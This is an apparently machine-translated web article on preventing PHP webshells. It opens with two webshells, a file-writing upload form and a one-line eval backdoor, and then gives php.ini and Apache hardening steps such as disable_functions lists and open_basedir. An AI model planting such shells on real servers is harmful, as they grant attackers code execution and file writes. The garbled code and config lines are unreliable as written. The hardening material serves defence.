Prevention of a php Trojan with the smallest PHP webpage trojan in the world

Php webpage Trojan
Copy codeThe Code is as follows:
<? Php
Header ("content-Type: text/html; charset = gb2312 ");
If (get_magic_quotes_gpc () foreach ($ _ POST as $ k => $ v) $ _ POST [$ k] = stripslashes ($ v );
?>
<Form method = "POST">
Save file name: <input type = "text" name = "file" size = "60" value = "<? Echo str_replace ('\', '/' ,__ FILE _)?> ">
<Br>
<Textarea name = "text" COLS = "70" ROWS = "18"> </textarea>
<Br>
<Input type = "submit" name = "submit" value = "save">
<Form>
<? Php
If (isset ($ _ POST ['file'])
{
$ Fp = @ fopen ($ _ POST ['file'], 'wb ');
Echo @ fwrite ($ fp, $ _ POST ['text'])? 'Saved successfully! ':' Saving failed! ';
@ Fclose ($ fp );
}
?>

Php Trojan
Copy codeThe Code is as follows:
<? Php eval ($ _ POST [cmd]);?>

Prevention of PHP Trojans
PHP is one of the tools that allow you to generate dynamic web pages. PHP webpage files are processed as common HTML webpage files. During editing, you can use the conventional HTML editing method to compile PHP.
PHP representative, Hypertext Preprocessor (PHP: Hypertext Preprocessor), can be freely downloaded from PHP official site (http://www.php.net. PHP complies with the GNU Public License (GPL), under which many popular software such as Linux and Emacs are born. PHP can run on most Unix platforms, GUN, Linux, and Microsoft Windows. Information on how to install PHP on a Windows PC or Unix server can be found on the official site of PHP. The installation process is simple.
Another advantage of PHP is its security. With the development of the Internet, network security is becoming more and more important. The birth of PHP almost replaces ASP, because PHP's security settings are extremely simple, unlike ASP, which requires many steps and disables many services. However, there will always be deficiencies in the good things. If the default setting of PHP agrees, it will be vulnerable. Therefore, this article will introduce how to configure PHP security to prevent the destruction of script Trojans.
1. Prevent php trojans from executing webshell
Open safe_mode and set disable_functions = passthru, exec, shell_exec in php. ini. Select either of them or both.
Ii. Prevent jumping out of the web directory
First, modify httpd. conf. If you only allow Your php script program to operate in the web directory, you can also modify the httpd. conf file to limit the php operation path. For example, if your web directory is/usr/local/apache/htdocs. add the following lines to the conf file: php_admin_value open_basedir/usr/local/apache/htdocs. If the script needs to read files other than/usr/local/apache/htdocs, if the error is displayed, the following error occurs: Warning: open_basedir restriction in effect. file is in wrong directory in/usr/local/apache/htdocs/open. php on line 4 and so on.
3. Prevent php trojans from reading and writing file directories
In php. in ini, disable_functions = passthru, exec, shell_exec, and system are followed by php file processing functions, including fopen, mkdir, rmdir, chmod, unlink, dir, fopen, fread, fclose, fwrite, file_exists, closedir, is_dir, readdir. opendir, fileperms. copy, unlink, and delfile. Disable_functions = passthru, exec, shell_exec, system, fopen, mkdir, rmdir, chmod, unlink, dir, fopen, fread, fclose, fwrite, file_exists, closedir, is_dir, readdir. opendir, fileperms. copy, unlink, and delfile.
Okay, it's done. We have no choice but to use the php Trojan. Unfortunately, those things that use the text database won't work anymore. If you build apache on the windos platform, you must note that apache runs the system permission by default. You must grant the following permissions to apache:
Net user apache f ** kmicrosoft/add
Net localgroup users apache/del
At this time, you have created an apche user that does not belong to any group. You only need to open the computer manager-service-apache service attribute-log on-this account, enter the account and password created above, and restart the apache service to run apache with low permissions.
Summary: in fact, you can also set the permissions of each folder to create a single read/write user for each directory to achieve security. Currently, many virtual host providers are using popular configuration methods. However, this method is used to prevent minor usage. As long as our administrators are aware of the security, the function of relatively blocking does not need to be used to ensure network security threats.

The following are mcafee's security settings to prevent webpage trojans from generating files.
Http://www.jb51.net/hack/list461_1.html